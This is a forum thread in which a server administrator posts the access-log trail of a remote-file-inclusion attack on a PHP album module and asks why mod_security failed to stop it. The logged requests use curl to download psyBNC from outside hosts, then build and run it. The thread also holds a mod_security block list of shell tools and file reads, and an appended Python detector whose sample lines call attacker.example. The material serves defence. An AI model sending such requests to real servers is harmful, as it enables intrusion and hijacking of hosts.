#1
10-12-2005, 11:56 AM
Registered User
 
Join Date: Aug 2003
Location: Israel
Posts: 19
parser
server hacked

Hello,

Today my server was hacked:
201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


I have modsec.user.conf, but it does not help. Why?

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "


# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"

# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "ps\x20"

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"

# WEB-ATTACKS /usr/bin/id command attempt
SecFilter "/usr/bin/id"

# WEB-ATTACKS id command attempt
SecFilter "\;id"

# WEB-ATTACKS echo command attempt
SecFilter "/bin/echo"

# WEB-ATTACKS kill command attempt
SecFilter "/bin/kill"

# WEB-ATTACKS chmod command attempt
SecFilter "/bin/chmod"

# WEB-ATTACKS chgrp command attempt
SecFilter "/chgrp"

# WEB-ATTACKS chown command attempt
SecFilter "/chown"

# WEB-ATTACKS chsh command attempt
SecFilter "/usr/bin/chsh"

# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilter "/usr/bin/gcc"

# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilter "/usr/bin/cc"

# WEB-ATTACKS cc command attempt
SecFilter "cc\x20"

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter "/usr/bin/cpp"

# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter "/usr/bin/g\+\+"

# WEB-ATTACKS g++ command attempt
SecFilter "g\+\+\x20"

# WEB-ATTACKS bin/python access attempt
SecFilter "bin/python"

# WEB-ATTACKS python access attempt
SecFilter "python\x20"

# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"

# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"

# WEB-ATTACKS bin/nasm command attempt
SecFilter "bin/nasm"

# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter "/usr/bin/perl"

# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"

# WEB-ATTACKS nt admin addition attempt
SecFilter "net localgroup administrators /add"

# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"

# WEB-ATTACKS ping command attempt
SecFilter "/bin/ping"

# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"

# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"

# WEB-ATTACKS xterm command attempt
SecFilter "/usr/X11R6/bin/xterm"

# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"

# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"

# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"

# WEB-ATTACKS mail command attempt
SecFilter "/bin/mail"

# WEB-ATTACKS mail command attempt
SecFilter "mail\x20"

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"

# WEB-ATTACKS /etc/inetd.conf access
SecFilter "/etc/inetd\.conf" log,pass

# WEB-ATTACKS /etc/motd access
SecFilter "/etc/motd" log,pass

# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow" log,pass

# WEB-ATTACKS conf/httpd.conf attempt
SecFilter "conf/httpd\.conf" log,pass

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup" log,pass

#PHP-NUKE spam filter
SecFilter "name=WebMail"

#PHP-NUKE web attack
SecFilter "cd%20/var/tmp;"

#PHP-NUKE web attack
SecFilter "cd%20/var/tmp"

#PHP-NUKE web attack
SecFilter "cd%20/tmp"

#PHP-NUKE web attack
SecFilter "chmod%204777"

# phpbb2 shell exploit
SecFilter "rush="
SecFilter "highlight=%2527"
SecFilter "highlight=%2725"
SecFilter "highlight=%27"
#2
10-12-2005, 03:37 PM
linux-image
Registered User
 
Join Date: Jun 2004
Location: India
Posts: 1,175
Check if LoadModule is active in the httpd.conf.
__________________
linux-image
AIM: "tux image"
Msn: "tux_image@hotmail.com"
Yahoo: "masternikx"

http://admin-ahead.com
Open Tickets: https://www.ticketforge.com
FAQ's: http://scriptmantra.info/

Tips: http://tips.admin-ahead.com
#3
10-12-2005, 04:03 PM
sh4ka
Registered User
 
Join Date: May 2005
Posts: 431
You had better check whether the AddModule line for mod_security is not commented out, or whether it exists in the AddModule section. Also try to activate all the processes listed under "background process killer" in "System Health" in the left WHM menu.

Is your mod_security installed from the add-on in WHM?
#4
10-12-2005, 05:11 PM
neta5
Registered User
 
Join Date: Oct 2005
Posts: 34
You mean it's better that we turn on these items?
BitchX
bnc
eggdrop
generic-sniffers
guardservices
ircd
psyBNC
ptlink
services
#5
10-12-2005, 05:52 PM
Registered User
 
Join Date: Aug 2003
Location: Israel
Posts: 19
parser
Quote:
Originally Posted by linux-image
Check if LoadModule is active in the httpd.conf.
It is active; the problem is with the filtering of mod_security.

In audit_log (mod_security's log), everything, for example "wget", is denied with code 406.
#6
10-12-2005, 05:57 PM
Registered User
 
Join Date: Aug 2003
Location: Israel
Posts: 19
parser
Quote:
Originally Posted by sh4ka
You had better check whether the AddModule line for mod_security is not commented out, or whether it exists in the AddModule section. Also try to activate all the processes listed under "background process killer" in "System Health" in the left WHM menu.

Is your mod_security installed from the add-on in WHM?

Yes, installed from WHM.
I activated all the processes listed under "background process killer". Thanks!
#7
10-13-2005, 11:16 AM
Registered User
 
Join Date: Aug 2005
Posts: 42
domtaj
The file got dropped by way of curl, so you had better put

SecFilterSelective THE_REQUEST "curl "

into mod_security's conf file,

as that will also stop other non-detected drops.
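As an added example (not code from any poster in this thread), here is a small Python detector that applies the logic behind domtaj's suggestion to access-log lines like the ones in the first post: it URL-decodes each query parameter and flags parameters that are themselves URLs (the remote include through basepath), shell metacharacters, and download tools, covering curl as well as wget. The log lines, IP and hosts in it are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the access log in the first post
# (documentation-range IP and placeholder hosts, not the real log).
SAMPLE_LOG = """\
192.0.2.10 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://attacker.example/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20attacker.example/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0"
192.0.2.10 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://attacker.example/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Oct/2005:01:02:11 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=modules/4nAlbum&catid=3 HTTP/1.1" 200 4021 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Download tools seen in this thread plus common siblings; the posted rule
# set blocked wget but not curl, which is how the drop got through.
DOWNLOADERS = ("wget", "curl", "lynx", "links", "fetch", "tftp", "ftp")

def analyse_target(target):
    """Return sorted findings for one request target (path?query)."""
    findings = set()
    query = target.partition("?")[2]
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(unquote(raw))  # second pass catches double encoding
        if re.match(r"(https?|ftp)://", value, re.I):
            findings.add(f"remote include via {name}")
        if re.search(r"[;|&`]", value):
            findings.add(f"shell metacharacter in {name}")
        for tool in DOWNLOADERS:
            if re.search(rf"(^|[\s;|&]){tool}\b", value):
                findings.add(f"{tool} in {name}")
        if re.search(r"(^|[\s;|&])cd\s+/(var/)?tmp\b", value):
            findings.add(f"cd to tmp in {name}")
    return sorted(findings)

def scan_log(text):
    """Return (ip, status, findings) for every line that raises a finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = analyse_target(m["target"])
            if findings:
                hits.append((m["ip"], int(m["status"]), findings))
    return hits
```

Because the check runs on the decoded value, a literal filter such as "cd%20/var/tmp" is not needed; the status code shows whether the request succeeded, so a 200 on a flagged line is what to triage first.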